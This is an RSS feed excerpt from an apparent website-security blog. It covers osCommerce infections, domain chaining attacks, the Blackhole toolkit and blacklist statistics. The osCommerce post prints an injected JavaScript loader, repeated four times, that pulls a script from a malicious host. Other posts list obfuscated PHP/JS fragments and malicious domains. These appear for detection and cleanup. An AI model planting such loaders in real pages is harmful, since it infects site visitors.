                h: elmH,
                x: bgX,
                y: bgY,
                r: bgR
        };
};
var i,s,ss=&quot;http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js&quot;,ss=&quot;http://roybeth.com/ext/jquery.php&quot;; try { s=document.createElement(&quot;script&quot;); s.src=ss; document.body.appendChild(s); } catch(erst) { }var i,s,ss=&quot;http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js&quot;,ss=&quot;http://roybeth.com/ext/jquery.php&quot;; try { s=document.createElement(&quot;script&quot;); s.src=ss; document.body.appendChild(s); } catch(erst) { }var i,s,ss=&quot;http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js&quot;,ss=&quot;http://roybeth.com/ext/jquery.php&quot;; try { s=document.createElement(&quot;script&quot;); s.src=ss; document.body.appendChild(s); } catch(erst) { }var i,s,ss=&quot;http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js&quot;,ss=&quot;http://roybeth.com/ext/jquery.php&quot;; try { s=document.createElement(&quot;script&quot;); s.src=ss; document.body.appendChild(s); } catch(erst) { }
</pre>
<p><strong>Recommended steps</strong><br />
First, remove the malware. Then, upgrade your installation of osCommerce and analyze your website for application vulnerabilities. Additionally, securing the permission settings of your &#8220;admin&#8221; directory or renaming the directory to a value different than the default can mitigate automated attacks.</p>
<p><strong>How do I protect my site?</strong><br />
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.</p>
<p>StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to <a href="http://www.stopthehacker.com/contact/">contact us</a>. You can also visit our <a href="http://www.stopthehacker.com/services/">services page</a> to protect your website now.</p>
<p>Till next time&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2011/11/07/oscommerce-hacks/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Domain Chaining Attacks</title>
		<link>http://www.stopthehacker.com/2011/10/17/persistent-javascript-attacks/</link>
		<comments>http://www.stopthehacker.com/2011/10/17/persistent-javascript-attacks/#comments</comments>
		<pubDate>Mon, 17 Oct 2011 15:01:08 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[blacklisting]]></category>
		<category><![CDATA[cssminibar]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[lizamoon]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[sidename]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=2770</guid>
		<description><![CDATA[Malicious hackers are constantly changing tactics in order to evade detection. One of the relatively new mechanisms that has been used to infect thousands of websites on the Internet is known as Domain Chaining. Domain Chaining is the act of using multiple malware infected domains to form a network that distributes exploit code to benign, [...]]]></description>
			<content:encoded><![CDATA[<p>Malicious hackers are constantly changing tactics in order to evade detection. One of the relatively new mechanisms that has been used to infect thousands of websites on the Internet is known as Domain Chaining.</p>
<p>Domain Chaining is the act of using multiple malware infected domains to form a network that distributes exploit code to benign, legitimate, websites that get compromised. This allows malicious hackers to reliably push exploit code to thousands of compromised websites, infecting the websites themselves and in turn the visitors to these sites.    </p>
<p><strong>What is a Domain Chaining attack?</strong><br />
Domain Chaining attacks have been on the rise since the beginning of this year.</p>
<p>The basic concept is as follows:</p>
<ol>
<li>Malicious hackers register multiple websites specifically to spread malware. This malware may exploit browser vulnerabilities to infect visitors&#8217; computers or may redirect unsuspecting users to websites that prompt them to install fake anti-virus software on their computer.</li>
<li>As in traditional attacks, the malicious hackers use a network of compromised, but legitimate, websites in addition to the dedicated malware distribution websites they registered to widely spread their malware across the Internet.</li>
</ol>
<p><strong>Why do malicious hackers use this approach?</strong><br />
There are a few benefits to using this mechanism. The first being that it becomes difficult for signature-based and honeypot-based detection systems to home in on the actual source of the malware versus only identifying the distribution points. Another &#8220;benefit&#8221; is what can be called &#8220;failover.&#8221;</p>
<p>We have blogged about hackers&#8217; understanding of the necessity of <a href="http://www.stopthehacker.com/2010/05/04/hackers-understand-the-value-of-backups/">failover</a> in the past. In case any security organization identifies a website in this malware chain as being dangerous and manages to shut it down, by using a number of websites to act as distribution points, the distribution of the actual exploit to website visitors does not stop. Think of it like a multi-headed Hydra.</p>
<p><strong>How do I know if my site is infected?</strong><br />
If your website is part of this Domain Chaining attack, it will most likely have one of these files.</p>
<pre class="brush: plain; title: ; notranslate">
script.php
cssminibar.js,
sidename.js,
jtoolsmini.js,
tempjs.js,
js.php,
jstools.js
</pre>
<p><strong>What do these files do?</strong><br />
These scripts load code from infected websites harboring malicious Iframes. The malicious Iframes in turn load exploit code via maliciously registered sites.</p>
<p>Maliciously registered sites related to this attack:</p>
<pre class="brush: plain; title: ; notranslate">
brkfnrmnk.co.cc
brlgnknc.co.cc
</pre>
<p>Maliciously registered sites related to previous Domain Chaining attacks:</p>
<pre class="brush: plain; title: ; notranslate">
klubnika34his.com,
bogdantevye.ru,
jwjmusic.cx.cc,
frankieeus.ru,
gaufridboris.ru,
stephanos.ru
</pre>
<p>The malicious website content is primarily distributed by a file named &#8220;wpqonfig.php&#8221; that redirects Iframes and scripts to a maliciously registered website.</p>
<p><strong>What script is used in the current attacks?</strong><br />
The latest version of this Domain Chaining attack uses the following script:</p>
<pre class="brush: plain; title: ; notranslate">
nbnjkl.com/urchin.js
</pre>
<p><strong>How do I protect my site?</strong><br />
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.</p>
<p>StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to <a href="http://www.stopthehacker.com/contact/">contact us</a>. You can also visit our <a href="http://www.stopthehacker.com/services/">services page</a> to protect your website now.</p>
<p>Till next time&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2011/10/17/persistent-javascript-attacks/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>BlackHole Toolkit: Malware Running Wild</title>
		<link>http://www.stopthehacker.com/2011/05/31/blackhole-toolkit/</link>
		<comments>http://www.stopthehacker.com/2011/05/31/blackhole-toolkit/#comments</comments>
		<pubDate>Tue, 31 May 2011 16:15:10 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[blackhole]]></category>
		<category><![CDATA[blackhole toolkit]]></category>
		<category><![CDATA[blacklisting]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[toolkit]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=2516</guid>
		<description><![CDATA[Malicious hackers are infecting websites in droves using new kinds of malware. Websites are the newest malware battleground. Benign websites are being compromised and infected by hackers in order to infect their visitors. In the vast majority of cases, the affected website owners are completely oblivious to the fact that a malicious hacker has used [...]]]></description>
			<content:encoded><![CDATA[<p>Malicious hackers are infecting websites in droves using new kinds of malware. Websites are the newest malware battleground. Benign websites are being compromised and infected by hackers in order to infect their visitors. In the vast majority of cases, the affected website owners are completely oblivious to the fact that a malicious hacker has used their website to infect their visitors.</p>
<p>In this article we will discuss a widespread strain of malware that already logs near <em>100,000</em> attempts per day on IPS (Intrusion Prevention System) or IDS (Intrusion Detection System) systems, trying to infect websites.</p>
<p><strong>What are Toolkits?</strong><br />
Malicious hackers sometimes use toolkits, pre-packaged pieces of computer code, which make it very easy to distribute malware, infect websites with it and then perform specific malicious activities with the now compromised site(s).</p>
<p>The strain of malware which we will discuss is related to a toolkit popularly known as the Blackhole Toolkit. This toolkit has been available for some time now and researchers at Symantec have <a href="http://www.symantec.com/connect/blogs/blackhole-theory">noted</a> the same.</p>
<p>How the toolkit works:</p>
<ol>
<li>Unsuspecting Internet surfers visit websites harboring malicious IFrame tags</li>
<li>Users are then redirected to servers which load malicious payloads via browser exploits or PDF, SWF based exploits</li>
<li>Often, a malicious JAR file is downloaded on the PC of the unsuspecting client
<ul>
<li>This JAR file contains malicious URLs which download further malware</li>
</ul>
</li>
<li>The downloaded trojan(s) can post a unique ID to a command-and-control server</li>
<li>The trojan then posts a list of the running processes on the victim’s computer to the server</li>
<li>The following three plugins are then downloaded:
<ul>
<li>stopav.plug – Tries to disable the antivirus installed on the victim’s computer</li>
<li>passw.plug – Log username/password combinations for connections being made</li>
<li>miniav.plug – Tries to delete copies of Zeus bots on the computer to prevent competition amongst malware on victim&#8217;s computer</li>
</ul>
</li>
<li>Finally, a fake Anti-Virus program is downloaded to the victim&#8217;s computer.</li>
</ol>
<p><strong>How to Identify an Infected Website</strong><br />
Search for instances of the following PHP code in files on your server or locate the JavaScript in the webpages delivered to clients. Below is a sample of the PHP code which aids the installation of this malware.</p>
<pre class="brush: php; title: ; notranslate">
$var=&quot;kfb2rpgv&quot;; echo base64_decode(str_rot13
</pre>
<p>The JavaScript produced by this code:</p>
<pre class="brush: jscript; title: ; notranslate">
try{try{a1=a2}catch(a){b[2]=21};}catch(a){k=&quot;ReferenceErr&quot;+a.toString().substr(0,0);};var ar=&quot;&gt;a)myuA1NhTvB\&quot;;zEr0c.pi (sngC}{d?lwt
</pre>
<p>The malicious IFrames generated as a result load content from the following sites:</p>
<pre class="brush: plain; title: ; notranslate">
marillador.cz.cc
web-traffic.cz.cc
yourstatscounter.cz.cc
beazenrad.cz.cc
loading-v-506.cz.cc
luckychance.cz.cc
cnc0098510m.cz.cc
newincposrtqw.cz.cc
upperblackeddy4.cz.cc
ndidrsjt.cz.cc
</pre>
<p>If you think you are facing a problem related to this specific strain of malware, please scan your computer with an Anti-Virus program (scanning with multiple Anti-Virus engines can yeild better results).</p>
<p><strong>We Can Help!</strong><br />
If you want to protect your site from infection, or you need additional support, please sign up for one of our <a href="http://www.stopthehacker.com/services/">services</a>.  Please <a href="http://www.stopthehacker.com/contact/">contact us</a> with your comments or questions.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2011/05/31/blackhole-toolkit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Analyzing the Google Blacklist, Part 2</title>
		<link>http://www.stopthehacker.com/2010/06/30/analyzing-the-google-blacklist-part-2/</link>
		<comments>http://www.stopthehacker.com/2010/06/30/analyzing-the-google-blacklist-part-2/#comments</comments>
		<pubDate>Wed, 30 Jun 2010 16:37:43 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[analysis]]></category>
		<category><![CDATA[blacklisting]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[monitoring]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=1857</guid>
		<description><![CDATA[Building on our first article in the series, we continue to analyze the Google Safe Browsing List. In this part, we present more detailed statistics about the hashes seen on the blacklist and try to provide insight into what we observe. Motivation Understanding the behavior of infected websites is very important. This provides security researchers [...]]]></description>
			<content:encoded><![CDATA[<p>Building on our first article in the series, we continue to analyze the <a href="http://www.google.com/tools/firefox/safebrowsing" target="_blank">Google Safe Browsing List</a>. In this part, we present more detailed statistics about the hashes seen on the blacklist and try to provide insight into what we observe.</p>
<p><strong>Motivation</strong><br />
Understanding the behavior of infected websites is very important. This provides security researchers with strategies to help deal a blow to the bad guys and at the same time, provide website owners and administrators an idea of the current state of website security.</p>
<p>Since the publication of our last article in this series, we have received good feedback from our colleagues in security. We will attempt to incorporate their comments and concerns in this part of the series.</p>
<p><strong>Methodology</strong><br />
We discussed the aim of this experiment and methodology in the <a href="http://www.stopthehacker.com/2010/06/28/analyzing-the-google-blacklist/">last part of this series</a>. We won&#8217;t repeat them here, but we encourage you to take a look at our first article in this series if you haven&#8217;t already read it!</p>
<p><strong>Analysis</strong><br />
Below we present some graphs which provide more information about the analysis.</p>
<ul>
<li><strong>Websites have a high probability of getting hacked on a Wednesday!</strong></li>
</ul>
<div id="attachment_1876" class="wp-caption aligncenter" style="width: 449px"><img class="size-full wp-image-1876" title="Websites have a high probability of getting hacked on a Wednesday!" src="http://www.stopthehacker.com/wp-content/uploads/2010/06/gma1.gif" alt="Websites have a high probability of getting hacked on a Wednesday!" width="439" height="328" /><p class="wp-caption-text">Websites have a high probability of getting hacked on a Wednesday!</p></div>
<ul>
<li><strong>Websites have a high probability of getting hacked between 7-8 PM PDT.</strong></li>
</ul>
<div id="attachment_1877" class="wp-caption aligncenter" style="width: 502px"><img class="size-full wp-image-1877" title="Websites have a high probability of getting hacked between 7-8 PM PDT." src="http://www.stopthehacker.com/wp-content/uploads/2010/06/gma2.gif" alt="Websites have a high probability of getting hacked between 7-8 PM PDT." width="492" height="337" /><p class="wp-caption-text">Websites have a high probability of getting hacked between 7-8 PM PDT.</p></div>
<ul>
<li>On Monday websites get hacked most between 11 AM to 12 Noon, PDT</li>
<li>On Tuesday websites get hacked most between 9 AM to 10 AM, PDT</li>
<li>On Wednesday websites get hacked most between 7 PM to 8 PM, PDT</li>
<li>On Thursday websites get hacked most between 10 PM to 11 PM, PDT</li>
<li>On Friday websites get hacked most between 11 AM to 12 Noon, PDT</li>
<li>On Saturday websites get hacked most between 1 PM to 2 PM, PDT</li>
<li>On Sunday websites get hacked most between 11 AM to 12 Noon, PDT</li>
</ul>
<p>Note: Most hashes which stay on the blacklist (over the 113 day period) seem to get added to the blacklist on Wednesday.</p>
<p><strong>Conclusions</strong><br />
We have presented more interesting statistics regarding the appearance of website hashes on the Google Safe Browsing List. These statistics provide information which website administrators and owners can use better arm themselves with against attackers. We will continue analyzing the dataset to provide more interesting information. If you have any questions please add a comment.</p>
<p>At <a href="http://www.stopthehacker.com" target="_self">stopthehacker.com</a>, we work hard to help you combat malicious hackers. If you would like to work with us, please drop us an <a href="http://www.stopthehacker.com/contact/" target="_self">email</a>. You can also visit our <a href="http://www.stopthehacker.com/services/" target="_self">services</a> page to find out how we can help you, in fact you can even sign up for <a href="http://www.stopthehacker.com/services/blacklist-monitoring/" target="_blank">free</a> services!</p>
<p>Till next time&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2010/06/30/analyzing-the-google-blacklist-part-2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Is User Trust More Effective Than Blacklisting?</title>
		<link>http://www.stopthehacker.com/2010/04/06/comparing-blacklists/</link>
		<comments>http://www.stopthehacker.com/2010/04/06/comparing-blacklists/#comments</comments>
		<pubDate>Tue, 06 Apr 2010 17:00:48 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[bing]]></category>
		<category><![CDATA[blacklisting]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[wot]]></category>
		<category><![CDATA[yahoo]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=1533</guid>
		<description><![CDATA[Blacklists are published by many security groups and organizations around the world to share knowledge about malicious websites, IP addresses and other security features which allow others to insulate themselves from the dark side of the Internet. In recent years, the number of blacklist being published by web-centric organizations have grown by leaps and bounds. [...]]]></description>
			<content:encoded><![CDATA[<p>Blacklists are published by many security groups and organizations around the world to share knowledge about malicious websites, IP addresses and other security features which allow others to insulate themselves from the dark side of the Internet.</p>
<p>In recent years, the number of blacklist being published by web-centric organizations have grown by leaps and bounds. Large Internet based companies such as <a href="http://www.google.com" target="_blank">Google</a>, <a href="http://www.yahoo.com" target="_blank">Yahoo</a> and <a href="http://www.bing.com" target="_blank">Microsoft</a> have been providing cues to their users about malicious websites in trying to make the Internet a safer place. <a href="http://www.google.com" target="_blank">Google</a> provides much more in-depth information than the other two, <a href="http://www.yahoo.com" target="_blank">Yahoo</a> and <a href="http://www.bing.com" target="_blank">Bing</a>, and seems to have sophisticated virtual machine based analysis tools which can detect misbehaving malicious code. Yahoo employs McAfee&#8217;s Search scan service while Bing potentially uses Microsoft specific technologies.</p>
<p><strong>Experiment Goal</strong></p>
<p>The aim of this experiment is to compare the coverage for each of the blacklists published by Google, Yahoo and Bing and compare them to what users in the Internet believe. To do this we will compare the results of Google, Yahoo, Bing and <a href="http://www.malware.com.br" target="_blank">Malware Patrol</a> with <a href="http://www.mywot.com" target="_blank">Web of Trust (WOT)</a>. Furthermore, we have also tried to see how many of these malicious URLs are also involved in Phishing. We have done this by looking up each URL/domain via <a href="http://www.phishtank.org" target="_blank">Phishtank&#8217;s</a> API.</p>
<p>Blacklists provide an easy mechanism for users (via browsers) and developers (via APIs) to assimilate security information about websites, IPs and such in order to make an informed decision about whether to allow or deny access to an IP or website.</p>
<p><strong>Methodology</strong></p>
<p>We have collected 1095 confirmed malicious links from <a href="http://www.malwareurl.com" target="_blank">MalwareURL</a>. Each of these links was tested to determine if they are listed on blacklists supplied by Google, Yahoo and Bing. Note that Yahoo and Bing unlike Google do not provide any direct APIs to probe their databases. Thereby each link, and its associated domain was pushed via an HTTP request to Yahoo and Bing to analyze if the results indicated that the domain/link was infected.</p>
<p>To determine if a website is present in the Google malware blacklist, the domain name along with the link and its variations, as defined here, are converted to MD5 hashes and checked using Google&#8217;s Safe Browsing API. For Malware Patrol, the aggressive version of their blacklist is downloaded and comparisons are made locally. For WOT, we employ their XML based API to gather information about the belief of users in the Internet. For Phishtank we have used their XML based API. The tests were conducted on Mar 22 2010.</p>
<div id="attachment_1541" class="wp-caption aligncenter" style="width: 295px"><img class="size-full wp-image-1541" title="Comparing blacklists" src="http://www.stopthehacker.com/wp-content/uploads/2010/03/Screenshot.png" alt="Popular blacklists cover only a minuscule percentage of malicious sites." width="285" height="262" /><p class="wp-caption-text">Popular blacklists cover only a minuscule percentage of malicious sites.</p></div>
<p><strong>Highlights</strong></p>
<ul>
<li>Google marked 0.18% of the URLs as unsafe.</li>
<li>Yahoo marked 1.0% of the URLs as unsafe.</li>
<li>Bing marked 0.09% of the URLs as unsafe.</li>
<li>Malware Patrol marked 0.63% of the URLs as unsafe.</li>
<li>Phishtank marked 0% of the URLs as unsafe.</li>
<li>WOT marked 99% of URLs as unsafe.</li>
</ul>
<p>Note: 1095 unique, malicious URLs were tested with each service.</p>
<p><strong>Observations</strong></p>
<p>Interestingly, Web Of Trust (WOT) marked 99% of the URLs with &#8220;poor&#8221; or &#8220;very poor&#8221; or &#8220;unsatisfactory&#8221; reputation. We have to assume that when users will see such a rating they will not visit the website in question and hence treat this kind of rating as unsafe, for the purposes of this test. It remains to be determined if WOT uses a data feed from a malware URL which we have used to prime the test set. Nonetheless, it is surprising to see that a company which specializes in collating the trust and opinions of web surfers performs better orders of magnitude than large Internet companies and established blacklist providers.</p>
<p>One must keep in mind though that Google&#8217;s approach to maintaining an ever changing blacklist is slightly different from the other actors in the game. Google publishes an updated version of its list every 30 minutes or so and specifies which MD5 hashes need to be purged and which ones need to be inserted. Some blacklist services do not take this approach and hence may claim to store information on millions of sites, which were infected at one point in time. The probability of this happening in the Google blacklist is low, because they have opened up a review process via their webmaster central area to update their blacklist.</p>
<p>In contrast, Bing and Yahoo do not provide public APIs for developers and applications to use.</p>
<p>Also, we see that none of the URL/domains were actually listed on Phishtank. It seems that websites which aim to infect users with malware are quite different from the set of sites used for phishing. It does not seem that malware laced websites are also used to commit phishing.</p>
<p><strong>Conclusion</strong></p>
<p>Large Internet companies, some of whom have published effective blacklists, used by many developers and application all over the world, still have a long way to go in order to become truly effective. As we have seen, only minuscule numbers of malicious websites are identified by the blacklist services. WOT seems to be extremely effective at identifying unsafe websites. It remains to be determined whether the data-set used for this test has a large overlap with any of the sources WOT uses to classify websites.</p>
<p>Another interesting result is that it does not seem that websites which aim to infect users with malware are actively involved in phishing campaigns.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2010/04/06/comparing-blacklists/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

